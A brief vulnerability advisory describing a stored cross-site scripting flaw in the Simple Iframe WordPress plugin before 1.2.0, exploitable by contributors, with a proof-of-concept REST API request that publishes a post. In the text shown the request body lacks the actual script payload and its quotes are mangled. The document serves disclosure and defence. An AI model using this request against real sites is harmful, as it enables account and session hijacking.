Simple Iframe < 1.2.0 - Contributor+ Stored XSS

The plugin does not properly validate one of its WordPress block attribute’s content, which may allow users whose role is at least that of a contributor to conduct Stored Cross-Site Scripting attacks.

PoC

POST /wp-json/wp/v2/posts/60?_locale=user HTTP/1.1 Host: 127.0.0.1 Content-Length: 378 sec-ch-ua: “Chromium”;v=“113”, “Not-A.Brand”;v=“24” sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Content-Type: application/json Accept: application/json, /;q=0.1 X-WP-Nonce: 653192f849 X-HTTP-Method-Override: PUT sec-ch-ua-platform: “Windows” Origin: http://127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1/wp-admin/post-new.php Accept-Encoding: gzip, deflate Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: [Contributor+] Connection: close {“id”:60,“title”:“XSS TEST”,“content”:“\n\n”,“status”:“publish”}